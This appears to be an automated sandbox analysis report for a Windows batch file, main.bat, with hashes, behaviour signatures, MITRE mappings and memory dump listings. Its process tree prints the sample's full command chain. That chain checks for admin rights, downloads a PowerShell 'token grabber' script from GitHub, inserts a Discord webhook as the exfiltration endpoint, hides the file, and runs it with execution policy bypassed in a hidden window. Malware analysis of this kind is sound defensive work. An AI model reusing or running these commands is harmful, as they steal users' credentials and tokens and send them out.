a08fbdb03519aba94086698e6b0dfff6ecaf6a1898947319d807c039c8847156

General

Target

main.bat
Size

1021B
MD5

2af9fa8f11372ee57de3a24d8194e933
SHA1

d762d1f8f41d945bed6ede83e0849abe72c45ead
SHA256

a08fbdb03519aba94086698e6b0dfff6ecaf6a1898947319d807c039c8847156
SHA512

a7f86397bb7d1feab2e8c42ffc7b164a0268d619a4cc8058af1d4b4cf61582f0efdae61bf2e292096f4fe2c17cee0913918fb3c866e4f7df81b48a5d7d66377d

Score

1^/10

Malware Config

Signatures

Delays execution with timeout.exe 1 IoCs

pid	Process
2820	timeout.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3024	powershell.exe
2628	powershell.exe
2276	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3024	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1640 wrote to memory of 2544	1640	cmd.exe	29
PID 1640 wrote to memory of 2544	1640	cmd.exe	29
PID 1640 wrote to memory of 2544	1640	cmd.exe	29
PID 2544 wrote to memory of 2708	2544	net.exe	30
PID 2544 wrote to memory of 2708	2544	net.exe	30
PID 2544 wrote to memory of 2708	2544	net.exe	30
PID 1640 wrote to memory of 3024	1640	cmd.exe	31
PID 1640 wrote to memory of 3024	1640	cmd.exe	31
PID 1640 wrote to memory of 3024	1640	cmd.exe	31
PID 1640 wrote to memory of 2520	1640	cmd.exe	32
PID 1640 wrote to memory of 2520	1640	cmd.exe	32
PID 1640 wrote to memory of 2520	1640	cmd.exe	32
PID 1640 wrote to memory of 2628	1640	cmd.exe	33
PID 1640 wrote to memory of 2628	1640	cmd.exe	33
PID 1640 wrote to memory of 2628	1640	cmd.exe	33
PID 1640 wrote to memory of 2276	1640	cmd.exe	34
PID 1640 wrote to memory of 2276	1640	cmd.exe	34
PID 1640 wrote to memory of 2276	1640	cmd.exe	34
PID 1640 wrote to memory of 3012	1640	cmd.exe	35
PID 1640 wrote to memory of 3012	1640	cmd.exe	35
PID 1640 wrote to memory of 3012	1640	cmd.exe	35
PID 1640 wrote to memory of 2820	1640	cmd.exe	36
PID 1640 wrote to memory of 2820	1640	cmd.exe	36
PID 1640 wrote to memory of 2820	1640	cmd.exe	36

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2520	attrib.exe
3012	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\main.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1640
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Powershell-Token-Grabber/main/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1210399637668888596/sq9DmWnxKx2Vge5EqmBBpL4Aiwl-hN_Dl0SLT0SDUAgRwBDBJETln7hznNqAh7pHoi4V' | Out-File -FilePath 'powershell123.ps1' -Encoding ASCII"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3024
- C:\Windows\system32\attrib.exe
  attrib +h +s powershell123.ps1
  2⤵
  - Views/modifies file attributes
  PID:2520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file powershell123.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2276
- C:\Windows\system32\attrib.exe
  attrib -h -s powershell123.ps1
  2⤵
  - Views/modifies file attributes
  PID:3012
- C:\Windows\system32\timeout.exe
  timeout 3
  2⤵
  - Delays execution with timeout.exe
  PID:2820

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:1632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\powershell123.ps1

Filesize
2B

MD5
81051bcc2cf1bedf378224b0a93e2877

SHA1
ba8ab5a0280b953aa97435ff8946cbcbb2755a27

SHA256
7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

SHA512
1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d2605916f69ed30e684651f539d5ed49

SHA1
0d435dcebad0ca95c54dcfd6473fda88d783d8e2

SHA256
aa245c18d8ecd97ac5b992f09c6640b1259900f8e8583be1bd8aae9b41521ac8

SHA512
1e438902848ea44281aa57890477017981e4af58173229664c05d01d22931898184957cce9dda225df9e6c09404a26b0b8ed42c24db85c9c64a26c5a7f60e677

Download Submit
memory/2276-38-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2276-34-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2276-35-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2276-36-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2276-37-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2276-33-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/2628-27-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2628-26-0x0000000002C6B000-0x0000000002CD2000-memory.dmp

Filesize
412KB

Download
memory/2628-19-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2628-22-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/2628-21-0x0000000002C60000-0x0000000002CE0000-memory.dmp

Filesize
512KB

Download
memory/2628-23-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2628-24-0x0000000002C60000-0x0000000002CE0000-memory.dmp

Filesize
512KB

Download
memory/2628-20-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

Filesize
9.6MB

Download
memory/2628-25-0x0000000002C60000-0x0000000002CE0000-memory.dmp

Filesize
512KB

Download
memory/3024-4-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/3024-11-0x0000000002EF0000-0x0000000002F70000-memory.dmp

Filesize
512KB

Download
memory/3024-10-0x0000000002EF4000-0x0000000002EF7000-memory.dmp

Filesize
12KB

Download
memory/3024-8-0x0000000002EF0000-0x0000000002F70000-memory.dmp

Filesize
512KB

Download
memory/3024-9-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/3024-6-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp

Filesize
9.6MB

Download
memory/3024-5-0x0000000002350000-0x0000000002358000-memory.dmp

Filesize
32KB

Download

Resubmissions

Analysis

Sharing